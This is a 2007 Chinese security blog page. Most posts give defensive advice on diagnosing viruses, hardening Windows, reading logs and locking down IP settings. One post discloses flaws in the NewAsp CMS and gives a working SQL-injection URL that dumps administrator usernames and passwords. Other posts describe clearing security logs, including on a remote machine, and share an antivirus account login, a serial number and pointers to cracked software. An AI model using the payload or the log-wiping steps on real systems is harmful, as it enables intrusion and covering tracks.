浏览模式: 普通 | 列表

推荐日志 中毒诊断

[ 2007-03-25 03:50:32 | 作者: sun ]
一、中毒的一些表现

  我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开,电脑不能正常启动、硬盘分区找不到了、数据丢失等等,就是中毒的一些征兆。

  二、中毒诊断

  1、按Ctrl+Shift+Ese键(同时按此三键),调出windows任务管理器查看系统运行的进程,找出不熟悉进程并记下其名称(这需要经验),如果这些进程是病毒的话,以便于后面的清除。暂时不要结束这些进程,因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态,如果CPU的利用率接近100%或内存的占用值居高不下,此时电脑中毒的可能性是95%。

  2、查看windows当前启动的服务项,由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言,正常的windows服务,基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外),此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称,假如其名称和路径为C:winntsystem32explored.exe,计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边,中间有一纵向的滚动条,而右边为空白,再双击添加/删除程序或管理工具,窗体内是空的,这是病毒文件winhlpp32.exe发作的特性。

  3、运行注册表编辑器,命令为regedit或regedt32,查看都有那些程序与windows一起启动。主要看Hkey_Local_MachineSoftwareMicroSoftWindowsCurrentVersionRun和后面几个RunOnce等,查看窗体右侧的项值,看是否有非法的启动项。WindowsXp运行msconfig也起相同的作用。随着经验的积累,你可以轻易的判断病毒的启动项。

  4、用浏览器上网判断。前一阵发作的Gaobot病毒,可以上yahoo.com,sony.com等网站,但是不能访问诸如www.symantec.com,www.ca.com这样著名的安全厂商的网站,安装了symantecNorton2004的杀毒软件不能上网升级。

  5、取消隐藏属性,查看系统文件夹winnt(windows)system32,如果打开后文件夹为空,表明电脑已经中毒;打开system32后,可以对图标按类型排序,看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks,wins,drivers.目前有的病毒执行文件就藏身于此;driversetc下的文件hosts是病毒喜欢篡改的对象,它本来只有700字节左右,被篡改后就成了1Kb以上,这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。

  6、由杀毒软件判断是否中毒,如果中毒,杀毒软件会被病毒程序自动终止,并且手动升级失败。

  三、灭毒

  1、在注册表里删除随系统启动的非法程序,然后在注册表中搜索所有该键值,删除之。当成系统服务启动的病毒程序,会在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身,找到之后一并消灭。

  2、停止有问题的服务,改自动为禁止。

  3、如果文件system32driversetchosts被篡改,恢复它,即只剩下一行有效值“127.0.0.1localhost”,其余的行删除。再把host设置成只读。

4、重启电脑,摁F8进“带网络的安全模式”。目的是不让病毒程序启动,又可以对Windows升级打补丁和对杀毒软件升级。

  5、搜索病毒的执行文件,手动消灭之。

  6、对Windows升级打补丁和对杀毒软件升级。

  7、关闭不必要的系统服务,如remoteregistryservice。

  8、第6步完成后用杀毒软件对系统进行全面的扫描,剿灭漏网之鱼。

  9、上步完成后,重启计算机,完成所有操作。

  
还有另一种查毒的方法:
启动好后 什也不要打开 在“开始——运行——cmd——netstat -a -n -o ”,看看有什么进程在通信 那个进程90%就是病毒或木马了

推荐日志 一系统安装多杀毒软件

[ 2007-03-25 03:50:20 | 作者: sun ]
本来、打算做教程了,一想做教程不好发表,所以就写了这个,希望对大家有帮助
前几天为了做免杀的需要,所以得安几个杀毒软件
目前比较流行的也就是江民,瑞星,金山,卡巴,这四个,其他的感觉都不怎么
地,所以不考虑了,不过在安装的时候出现了一个问题,就是都装上重起电脑之后
江民的语言选择里面没有简体中文了,这个挺郁闷的,不过最郁闷的还在后面,拨
号上网后,QQ上不去,网页打不开,PING也不通,用netstat命令查看网络状态一
看,竟然所有端口的连接都不正常,这可郁闷坏我了,重新做一次系统,多个心眼
用GHOST做个备份(以前的也有备份,不过系统里装的东西过时了```)然后试了拨
号,一切都正常,呵呵,这回先到网上查查看有没有相关的资料,当然是百度了,
不过什么也没有找到,没这方面的问题介绍,郁闷中……
没办法,自己琢磨了,我们GO ON吧,这回一个一个装,装了江民,没问题,
又装了卡巴,也没问题,又装金山,晕,出问题了````,还是老问题,上不去网了
没办法,用GHOST恢复系统吧,接下来试的就别提了,试了3个多小时,最后下定了
结论,是金山的问题,思考一下,到底是什么问题呢,莫非系统文件冲突,那么就
少装一些项目,装的时候少选几项试试,又用了1个多小时,问题终于找到了`````
原来是金山网标的问题,一想想,肯定是金山网标与其他的杀毒软件防火墙有冲突
问题找到了,这回可以好好装了,恢复系统,装杀毒软件,终于行了~~~太兴奋了`
终于成功了```下面就给大家写一下关与安装多个杀毒软件的方法吧,首先必须
说明的是,安装完一个杀毒软件之后必须设置开机禁止启动,因为如果电脑开机启
动多个杀毒软件会很卡的,而且有时候反应很慢,更严重的是会引起系统蓝屏或崩溃
建议大家最后装卡巴,为什么?自己试试就知道了````。
江民的设置:打开主程序(KV2006),点操作台切换,恢复窗口,工具→设置→
实时监控,把所有开机启动的项目全部去掉,确定。
瑞星的设置:打开主程序(瑞星杀毒软件),设置→详细设置→瑞星监控中心,
把所有开机启动的项目去掉,确定。
金山的设置:打开主程序(金山毒霸2006),工具→综合设置→防毒设置→用户
自定义→文件实时防毒/邮件监控/网页安全扫描(把启动的项目的钩去掉)确定。
在这里要说明一点,在文件实时防毒的页面,把发现病毒时的处理方式改为禁止访问
该文件,否则你的黑软会一下子全没了```我以前就知道,不过我朋友前一段时间就
忘了,结果可想而知了```害得他整整郁闷了一个星期~。
卡巴的设置:打开主程序(版本很多,主程序名我也不好说),设置→接下来的
自己找吧,版本太多了,每个都不一样```我也说不清楚。
当然你要想机器平时用的方便,设置更多了,比如江民,瑞星,金山都有自带的
小精灵,小护士,助手什么的,最好别让他们工作,很讨厌(这个词不光女孩子能用
哦,嘿嘿~)。
接下来要提醒大家,如果是搞黑客技术的,最好用GHOST多做几个备份(什么?
不会用GHOST?往下看吧),因为用的软件多了装的太多机器肯定很卡的,这点大家
应该有同感~
至于GHOST的用法(最好自己去网上查,说的比较详细),如果大家不会用DOS,
那就用矮人DOS工具箱5.0,傻瓜化的,适合对DOS不太了解的人`
这里说明大家安装江民后出现的一个严重问题,就是每次开机都扫描硬盘,我看
过网上对这方面的介绍,都不全,而且有一点没有说到,在这里说一下,解决方法是
打开江民的设置选项→扫描选项→其他动作,把四个项目的钩都去掉(每个选项的作
用大家都能读明白吧,我就不详细说了),然后确定,之后打开注册表(单击“开始
→运行”,在“运行”对话框中输入“regedit”打开注册表编辑器)依次选择
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager”然
后在右侧窗口中找到“BootExecute”键值项,右键选择修改,里面数值是
autocheck autochk *
KvNative.exe
把KvNative.exe去掉然后点确定,F5刷新就可以了,以后就不会启动江民自带的开机
扫描了。
大家知道电脑非正常关机的情况下重起电脑以后也会开机扫描,这是很正常的,如果
以后永远不想让电脑开机扫描就把里面的数值全部清空,确定,F5刷新,就可以了
不过建议大家先备份一下注册表再清空里面的数据(因为如果电脑经常非正常关机而
且不开机扫描硬盘,那么会造成硬盘数据破坏后无法删除!),不过清空了也没关系
我们可以用chkdsk命令来强迫电脑开机扫描硬盘,至于chkdsk命令的用法大家就到网
上自己查吧。
最后就是免费升级杀毒软件了
江民:通行证帐号:sphack 密码:sphack 密码改了我也能找回来,因为我知道
用的人多了,升级次数多了,自然就不能升级了,建议大家2天升级一次吧,还有就是
我会陆续更新新的江民通行证,请留意http://www.sphack.cn,谢谢大家支持。
瑞星:序列号: T1BULQ-70AWDE-9P90SF-7TD200?用户ID:RB2NA22T
注意大家千万别点自动升级,因为点自动升级之后就不能用了,大家用瑞星升级保姆
吧,这个保姆是随时更新的,保证用户可以免费升级~下载地址请关注天天杀毒网
http://www.sdday.com,这里有你想要的东东,看了绝对不后悔~
金山:天天杀毒网有破解版的金山2006,如果想用正版的,需要通行证和密码,
不过由于本通行证不随便对外公开,所以暂时不提供。
卡巴:这个好弄,网上到处都有下载,而且有序列号,不过建议大家到天天杀毒网
去下载,因为那里保证下载的东东没问题(现在网络可不安全,危险随时都在),声明
啊,我可不是给天天杀毒网做广告,他可不给我任何好处,只是感觉这个网站有用的东
西太多了。。。
最后给计算机/网络技术初学者一句话,就是遇到问题的时候别总想着去问别人,
自己养成用搜索引擎找答案的习惯,曾经我记得黑客基地的一个VIP会员说过,百度是
你最好的老师~每当我遇到问题的时候,总会想起这句话。
好了,就写这么多吧,打字打的手都酸了,GOOD LUCK !

推荐日志 谈工作站的安全政策

[ 2007-03-25 03:50:02 | 作者: sun ]
举凡一般企业当中,除了一些提供网络服务的服务器外,更多数的是一般工作站或可移动的笔记型计算机,亦因其数量远远多过于服务器主机,IT人员可以考虑制定标准的工作站安全政策,利用一些安全设定与保护机制来管理这些有潜在风险的工作站。


我们因着过去的一些经验,提供了一些方向给IT人员参考。

实体的安全

设定使用者授权机制:在企业的网络环境里,可以设定唯有授权的使用者,方可使用企业内部的工作站主机,另外,亦提醒使用者可以启动屏幕保护程序限制未被授权的人无法使用,以保护工作站中所存放的数据。

设定适当的存取控制权限:对于计算机中机密或重要的档案/目录进行权限控制,非授权的使用者无法读取重要的档案,或者亦可考虑利用密码保护功能进行控制。

制定计算机硬件的安装机制:可移动式的储存设备愈来愈普遍化,但随着愈方便地使用亦愈容易成为漏洞的所在,IT人员可以考虑制定硬件管理的机制。

系统的安全设定

重视软件相关的安全修补程序:注意软件开发厂商提供的修补程序,并确实执行修补作业。

安装防毒软件并定期更新病毒码及引击:利用防毒软件进行病毒的防护机制,并确实更新程序,以达到有效的预防。

远程管理的安全性:远程管理工具提供给IT人员一个便利的管道来管理企业中的计算机,但可能一不小心便成为黑客的后门,IT人员需特别注意。

减少不必要的应用程序:这点是老生常谈了,在工作站上只要有不必要的应用程序,就将它移除或停止启动。

数据的保护

定期执行备份工作:工作站上重要的档案需定期执行备份或者将档案备份到企业的档案伺服主机。

知识的传达

提升使用者对安全的认知:因为并非每个使用者都有IT人员的专业资安概念,所以,IT人员可善用一些机会,给予一般使用者信息安全的认知与概念。

善用工作站管理程序,统一管理企业计算机软硬件:对于IT人员,可以善用管理程序来管理企业内部的软硬件,找出是否有工作站安装了未经授权的软件,或执行不安全的软件。

不随意下载或执行来源不明的档案或程序:提醒每个使用者不要执行来路不明的程序,减少一些资安上的风险。

透过 DragonSoft Secure Scanner(DSS) 检查您企业中的工作站是否安装或启动哪些未经授权的软件。

进行一个安全检测,并采用"一般检测"政策,检测目标选择您欲检查的主机,您可以分不同部门来进行检测作业,届时针对不同部门给予建议等。

按下工具列上的开始按钮进行检测。

检测完成后,按下工具列上的报表按钮,进行报表产生。

报表产生后,其中一部份就是记录着被检测主机上的服务信息,依着报告您即可提醒公司内部人员,进行修正,以符合公司所订定的安全政策。

推荐日志 新云网站管理系统文件注入漏洞

[ 2007-03-25 03:49:51 | 作者: sun ]
关于新云


新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。

漏洞原理

利用各种方法实现入侵,如COOKIES、抓包、注入检测等。

1.过滤未全

user\articlepost.asp 文件第333行


Quote
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
username=’" & Newasp.MemberName & "’
And ArticleID=" & Request("ArticleID")


没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:


articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin


注册后直接在浏览器上输入,就可以爆出管理员的表和代码。

2.新云2.1SQL版注入漏洞

漏洞描述:

动画频道的“动画管理”和“审核管理”,错误类型:


Quote
Microsoft OLE DB Provider for SQL Server (0x80040E14)
未能找到存储过程 ’NC_FlashAdminList’。
/admin/admin_Flash.asp, 第 233 行


可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:


articlepost.asp?ChannelID=1&action=view&ArticleID=1;--


3.COOKIES欺骗获取管理账号

攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。

推荐日志 避免网络IP地址被非法修改

[ 2007-03-25 03:49:39 | 作者: sun ]
局域网中各工作站的TCP/IP参数被随意修改后,很容易造成IP地址的冲突,这会给管理工作带来不小的麻烦。那么,有没有办法保护好自己的网络,不让别人非法修改IP地址呢?  



其实,很简单,你只要参照下面的步骤,就能轻松避免IP地址被非法修改的麻烦!


注册表设置法


首先,需要将桌面上的“网上邻居”图标隐藏起来,让其他人无法通过“网上邻居”属性窗口,进入到TCP/IP参数设置界面。依次展开注册表编辑窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子键,然后在“Explorer”子键下面,创建一名为“NoNetHood”双字节值,并将它设置为“1”,就可以了。


其次,再将控制面板窗口中的“网络”图标,隐藏起来,那么其他人根本就打不开TCP/IP参数设置界面了。只要你打开“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]处,输入一行形如“netcpl.cpl=no”的代码,重新保存后,“网络”图标就从控制面板窗口中消失了。


到了这里,所有可以修改IP的途径都被“切断”了,这样其他人即使想修改IP地址,也无处下手了。当然,这种方法只能蒙蒙菜鸟网民,对于“大虾”级的网民来说,几乎就是聋子的耳朵——摆设。因为网民一旦找到“netcpl.cpl”文件,还是有办法恢复“网络”或“网上邻居”图标的,为此,你还需要进行下面的工作,才能真正意义上“切断”IP的修改通道:


依次展开注册表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子键,然后在“Network”子键下面,创建一个名为“NoNetSetup”的双字节值,并将它设置为“1”;之后,你再想打开“网上邻居”或“网络”属性窗口时,将会得到无权访问的提示。


局域网中各工作站的TCP/IP参数被随意修改后,很容易造成IP地址的冲突,这会给管理工作带来不小的麻烦。那么,有没有办法保护好自己的网络,不让别人非法修改IP地址呢?  


其实,很简单,你只要参照下面的步骤,就能轻松避免IP地址被非法修改的麻烦!


注册表设置法


首先,需要将桌面上的“网上邻居”图标隐藏起来,让其他人无法通过“网上邻居”属性窗口,进入到TCP/IP参数设置界面。依次展开注册表编辑窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子键,然后在“Explorer”子键下面,创建一名为“NoNetHood”双字节值,并将它设置为“1”,就可以了。


其次,再将控制面板窗口中的“网络”图标,隐藏起来,那么其他人根本就打不开TCP/IP参数设置界面了。只要你打开“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]处,输入一行形如“netcpl.cpl=no”的代码,重新保存后,“网络”图标就从控制面板窗口中消失了。


到了这里,所有可以修改IP的途径都被“切断”了,这样其他人即使想修改IP地址,也无处下手了。当然,这种方法只能蒙蒙菜鸟网民,对于“大虾”级的网民来说,几乎就是聋子的耳朵——摆设。因为网民一旦找到“netcpl.cpl”文件,还是有办法恢复“网络”或“网上邻居”图标的,为此,你还需要进行下面的工作,才能真正意义上“切断”IP的修改通道:


依次展开注册表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子键,然后在“Network”子键下面,创建一个名为“NoNetSetup”的双字节值,并将它设置为“1”;之后,你再想打开“网上邻居”或“网络”属性窗口时,将会得到无权访问的提示。


地址绑定法


除了通过切断修改IP的“通道”,来禁止其他人非法修改IP地址外,你也可以直接对指定IP地址,进行限制,让其他人即使修改了地址,也无法进行网络连接。在限制IP地址时,可以用地址绑定法来实现:


首先将系统切换到DOS命令行状态下,执行“ipconfig /all”命令,在弹出的窗口中,将网卡的MAC地址、IP地址记录下来;   


下面在代理服务器端,将指定IP地址与对应的MAC地址,绑定在一起,以后即使有人在你的计算机中,修改了IP地址,他也无法通过代理服务器,进行网络连接。例如,在绑定前面的IP地址时,可以在DOS命令行中,执行“arp -s 10.168.160.10 00-30-6E-36-5A-EF”命令,就能将静态IP地址“10.168.160.10”和网卡的MAC地址“00-30-6E-36-5A-EF”绑定在一起了。


在局域网中,使用代理服务器上网的工作站,都能通过上述方法,来限制修改静态IP地址。要是日后需要为IP地址“松绑”的话,只要执行“arp -d 10.168.160.10 00-30-6E-36-5A-EF”命令就可以了。


要是你的局域网,使用的是三层交换机来连接各个工作站的话,那么你只需要在每一个交换端口处,对IP地址进行一下限定,让其他人即使修改了IP地址,也无法通过交换机上网。

推荐日志 系统安全防范之Windows日志与入侵检测

[ 2007-03-25 03:49:28 | 作者: sun ]

一、日志文件的特殊性

要了解日志文件,首先就要从它的特殊性讲起,说它特殊是因为这个文件由系统管理,并加以保护,一般情况下普通用户不能随意更改。我们不能用针对普通TXT文件的编辑方法来编辑它。例如WPS系列、Word系列、写字板、Edit等等,都奈何它不得。我们甚至不能对它进行“重命名”或“删除”、“移动”操作,否则系统就会很不客气告诉你:访问被拒绝。当然,在纯DOS的状态下,可以对它进行一些常规操作(例如Win98状态下),但是你很快就会发现,你的修改根本就无济于事,当重新启动Windows 98时,系统将会自动检查这个特殊的文本文件,若不存在就会自动产生一个;若存在的话,将向该文本追加日志记录。

二、黑客为什么会对日志文件感兴趣

黑客们在获得服务器的系统管理员权限之后就可以随意破坏系统上的文件了,包括日志文件。但是这一切都将被系统日志所记录下来,所以黑客们想要隐藏自己的入侵踪迹,就必须对日志进行修改。最简单的方法就是删除系统日志文件,但这样做一般都是初级黑客所为,真正的高级黑客们总是用修改日志的方法来防止系统管理员追踪到自己,网络上有很多专门进行此类功能的程序,例如Zap、Wipe等。

三、Windows系列日志系统简介

1.Windows 98的日志文件

因目前绝大多数的用户还是使用的操作系统是Windows 98,所以本节先从Windows 98的日志文件讲起。Windows 98下的普通用户无需使用系统日志,除非有特殊用途,例如,利用Windows 98建立个人Web服务器时,就会需要启用系统日志来作为服务器安全方面的参考,当已利用Windows 98建立个人Web服务器的用户,可以进行下列操作来启用日志功能。

(1)在“控制面板”中双击“个人Web服务器”图标;(必须已经在配置好相关的网络协议,并添加“个人Web服务器”的情况下)。

(2)在“管理”选项卡中单击“管理”按钮;   

(3)在“Internet服务管理员”页中单击“WWW管理”;   

(4)在“WWW管理”页中单击“日志”选项卡;   

(5)选中“启用日志”复选框,并根据需要进行更改。 将日志文件命名为“Inetserver_event.log”。如果“日志”选项卡中没有指定日志文件的目录,则文件将被保存在Windows文件夹中。

普通用户可以在Windows 98的系统文件夹中找到日志文件schedlog.txt。我们可以通过以下几种方法找到它。在“开始”/“查找”中查找到它,或是启动“任务计划程序”,在“高级”菜单中单击“查看日志”来查看到它。Windows 98的普通用户的日志文件很简单,只是记录了一些预先设定的任务运行过程,相对于作为服务器的NT操作系统,真正的黑客们很少对Windows 98发生兴趣。所以Windows 98下的日志不为人们所重视。

2.Windows NT下的日志系统

Windows NT是目前受到攻击较多的操作系统,在Windows NT中,日志文件几乎对系统中的每一项事务都要做一定程度上的审计。Windows NT的日志文件一般分为三类:

系统日志 :跟踪各种各样的系统事件,记录由 Windows NT 的系统组件产生的事件。例如,在启动过程加载驱动程序错误或其它系统组件的失败记录在系统日志中。

应用程序日志:记录由应用程序或系统程序产生的事件,比如应用程序产生的装载dll(动态链接库)失败的信息将出现在日志中。

安全日志 :记录登录上网、下网、改变访问权限以及系统启动和关闭等事件以及与创建、打开或删除文件等资源使用相关联的事件。利用系统的“事件管理器”可以指定在安全日志中记录需要记录的事件,安全日志的默认状态是关闭的。

Windows NT的日志系统通常放在下面的位置,根据操作系统的不同略有变化。


C:\systemroot\system32\config\sysevent.evt
C:\systemroot\system32\config\secevent.evt
C:\systemroot\system32\config\appevent.evt



Windows NT使用了一种特殊的格式存放它的日志文件,这种格式的文件可以被事件查看器读取,事件查看器可以在“控制面板”中找到,系统管理员可以使用事件查看器选择要查看的日志条目,查看条件包括类别、用户和消息类型。

3.Windows 2000的日志系统

与Windows NT一样,Windows 2000中也一样使用“事件查看器”来管理日志系统,也同样需要用系统管理员身份进入系统后方可进行操作,如图7-1所示。

在Windows 2000中,日志文件的类型比较多,通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所开启的服务不同而略有变化。启动Windows 2000时,事件日志服务会自动启动,所有用户都可以查看“应用程序日志”,但是只有系统管理员才能访问“安全日志”和“系统日志”。系统默认的情况下会关闭“安全日志”,但我们可以使用“组策略”来启用“安全日志”开始记录。安全日志一旦开启,就会无限制的记录下去,直到装满时停止运行。

Windows 2000日志文件默认位置:

应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%\sys tem32\config,默认文件大小512KB,但有经验的系统管理员往往都会改变这个默认大小。

安全日志文件:c:\sys temroot\sys tem32\config\SecEvent.EVT

系统日志文件:c:\sys temroot\sys tem32\config\SysEvent.EVT

应用程序日志文件:c:\sys temroot\sys tem32\config\AppEvent.EVT

Internet信息服务FTP日志默认位置:c:\systemroot\sys tem32\logfiles\msftpsvc1\。

Internet信息服务WWW日志默认位置:c:\systemroot\sys tem32\logfiles\w3svc1\。

Scheduler服务器日志默认位置:c:\systemroot\schedlgu.txt 。该日志记录了访问者的IP,访问的时间及请求访问的内容。

因Windows2000延续了NT的日志文件,并在其基础上又增加了FTP和WWW日志,故本节对FTP日志和WWW日志作一个简单的讲述。FTP日志以文本形式的文件详细地记录了以FTP方式上传文件的文件、来源、文件名等等。不过由于该日志太明显,所以高级黑客们根本不会用这种方法来传文件,取而代之的是使用RCP。FTP日志文件和WWW日志文件产生的日志一般在c:\sys temroot\system32\LogFiles\W3SVC1目录下,默认是每天一个日志文件,

FTP和WWW日志可以删除,但是FTP日志所记录的一切还是会在系统日志和安全日志里记录下来,如果用户需要尝试删除这些文件,通过一些并不算太复杂的方法,例如首先停止某些服务,然后就可以将该日志文件删除。具体方法本节略。

Windows 2000中提供了一个叫做安全日志分析器(CyberSafe Log Analyst,CLA)的工具,有很强的日志管理功能,它可以使用户不必在让人眼花缭乱的日志中慢慢寻找某条记录,而是通过分类的方式将各种事件整理好,让用户能迅速找到所需要的条目。它的另一个突出特点是能够对整个网络环境中多个系统的各种活动同时进行分析,避免了一个个单独去分析的麻烦。

4.Windows XP日志文件

说Windows XP的日志文件,就要先说说Internet连接防火墙(ICF)的日志,ICF的日志可以分为两类:一类是ICF审核通过的IP数据包,而一类是ICF抛弃的IP数据包。日志一般存于Windows目录之下,文件名是pfirewall.log。其文件格式符合W3C扩展日志文件格式(W3C Extended Log File Format),分为两部分,分别是文件头(Head Information)和文件主体(Body Information)。文件头主要是关于Pfirewall.log这个文件的说明,需要注意的主要是文件主体部分。文件主体部分记录有每一个成功通过ICF审核或者被ICF所抛弃的IP数据包的信息,包括源地址、目的地址、端口、时间、协议以及其他一些信息。理解这些信息需要较多的TCP/IP协议的知识。ICF生成安全日志时使用的格式是W3C扩展日志文件格式,这与在常用日志分析工具中使用的格式类似。 当我们在WindowsXP的“控制面板”中,打开事件查看器.


就可以看到WindowsXP中同样也有着系统日志、安全日志和应用日志三种常见的日志文件,当你单击其中任一文件时,就可以看见日志文件中的一些记录.

若要启用对不成功的连接尝试的记录,请选中“记录丢弃的数据包”复选框,否则禁用。另外,我们还可以用金山网镖等工具软件将“安全日志”导出和被删除。

5.日志分析

当日志每天都忠实的为用户记录着系统所发生的一切的时候,用户同样也需要经常规范管理日志,但是庞大的日志记录却又令用户茫然失措,此时,我们就会需要使用工具对日志进行分析、汇总,日志分析可以帮助用户从日志记录中获取有用的信息,以便用户可以针对不同的情况采取必要的措施。

6.系统日志的删除

因操作系统的不同,所以日志的删除方法也略有变化,本文从Windows 98和Windows 2000两种有明显区别的操作系统来讲述日志的删除。

7.Windows 98下的日志删除

在纯DOS下启动计算机,用一些常用的修改或删除命令就可以消除Windows 98日志记录。当重新启动Windows98后,系统会检查日志文件的存在,如果发现日志文件不存在,系统将自动重建一个,但原有的日志文件将全部被消除。

8.Windows 2000的日志删除

Windows 2000的日志可就比Windows 98复杂得多了,我们知道,日志是由系统来管理、保护的,一般情况下是禁止删除或修改,而且它还与注册表密切相关。在Windows 2000中删除日志首先要取得系统管理员权限,因为安全日志和系统日志必须由系统管理员方可查看,然后才可以删除它们。

我们将针对应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志的删除做一个简单的讲解。要删除日志文件,就必须停止系统对日志文件的保护功能。我们可以使用命令语句来删除除了安全日志和系统日志外的日志文件,但安全日志就必须要使用系统中的“事件查看器”来控制它,打开“控制面板”的“管理工具”中的“事件查看器”。在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单.

输入远程计算机的IP,然后需要等待,选择远程计算机的安全性日志,点击属性里的“清除日志”按钮即可。

9.发现入侵踪迹

如何当入侵者企图或已经进行系统的时候,及时有效的发现踪迹是目前防范入侵的热门话题之一。发现入侵踪迹的前题就是应该有一个入侵特征数据库,我们一般使用系统日志、防火墙、检查IP报头(IP header)的来源地址、检测Email的安全性以及使用入侵检测系统(IDS)等来判断是否有入侵迹象。

我们先来学习一下如何利用端口的常识来判断是否有入侵迹象:

电脑在安装以后,如果不加以调整,其默认开放的端口号是139,如果不开放其它端口的话,黑客正常情况下是无法进入系统的。如果平常系统经常进行病毒检查的话,而突然间电脑上网的时候会感到有反应缓慢、鼠标不听使唤、蓝屏、系统死机及其它种种不正常的情况,我们就可以判断有黑客利用电子信件或其它方法在系统中植入的特洛伊木马。此时,我们就可以采取一些方法来清除它,具体方法在本书的相关章节可以查阅。

10.遭受入侵时的迹象

入侵总是按照一定的步骤在进行,有经验的系统管理员完全可以通过观察到系统是否出现异常现象来判断入侵的程度。

11.扫描迹象

当系统收到连续、反复的端口连接请求时,就可能意味着入侵者正在使用端口扫描器对系统进行外部扫描。高级黑客们可能会用秘密扫描工具来躲避检测,但实际上有经验的系统管理员还是可以通过多种迹象来判断一切。

12.利用攻击

当入侵者使用各种程序对系统进行入侵时,系统可能报告出一些异常情况,并给出相关文件(IDS常用的处理方法),当入侵者入侵成功后,系统总会留下或多或少的破坏和非正常访问迹象,这时就应该发现系统可能已遭遇入侵。

推荐日志 打造100%绝对安全的个人电脑

[ 2007-03-25 03:49:03 | 作者: sun ]
细想一下,现在大多数人的电脑这只未必安全,真好闲暇无事,特发此帖,希望对大家有所帮助!!!

由于现在家用电脑所使用的操作系统多数为WinXP 和Win2000 pro(建议还在使用98的朋友换换系统,连_blank/>微软都放弃了的系统你还用它干嘛?)所以后面我将主要讲一下基于这两个操作系统的安全防范。


个人电脑常见的被入侵方式


谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种:


(1) 被他人盗取密码;


(2) 系统被_blank/>木马攻击;


(3) 浏览网页时被恶意的java scrpit程序攻击;


(4) QQ被攻击或泄漏信息;


(5) 病毒感染;


(6) 系统存在漏洞使他人攻击自己。


(7) _blank/>黑客的恶意攻击。


下面我们就来看看通过什么样的手段来更有效的防范攻击。


查本地共享资源

删除共享

删除ipc$空连接

账号密码的安全原则

关闭自己的139端口

445端口的关闭

3389的关闭

4899的防范

常见端口的介绍

如何查看本机打开的端口和过滤

禁用服务

本地策略

本地安全策略

用户权限分配策略

终端服务配置

用户和组策略

防止rpc漏洞

自己动手DIY在本地策略的安全选项

工具介绍

避免被恶意代码 木马等病毒攻击


1.查看本地共享资源


运行CMD输入net share,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。


2.删除共享(每次输入一个)


net share admin$ /delete

net share c$ /delete

net share d$ /delete(如果有e,f,……可以继续删除)


3.删除ipc$空连接


在运行内输入regedit,在_blank/>注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1。


4.关闭自己的139端口,ipc和RPC漏洞存在于此。


关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。


5.防止rpc漏洞


打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。


XP SP2和2000 pro sp4,均不存在该漏洞。


6.445端口的关闭


修改注册表,添加一个键值

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为0这样就ok了。


7.3389的关闭


XP:我的电脑上点右键选属性--/>远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。


Win2000server 开始--/>程序--/>管理工具--/>服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用)


使用2000 pro的朋友注意,网络上有很多文章说在Win2000pro 开始--/>设置--/>控制面板--/>管理工具--/>服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在2000pro 中根本不存在Terminal Services。


8.4899的防范


网络上有许多关于3389和4899的入侵方法。4899其实是一个远程控制软件所开启的服务端端口,由于这些控制软件功能强大,所以经常被黑客用来控制自己的肉鸡,而且这类软件一般不会被杀毒软件查杀,比后门还要安全。


4899不象3389那样,是系统自带的服务。需要自己安装,而且需要将服务端上传到入侵的电脑并运行服务,才能达到控制的目的。


所以只要你的电脑做了基本的安全配置,黑客是很难通过4899来控制你的。

9、禁用服务


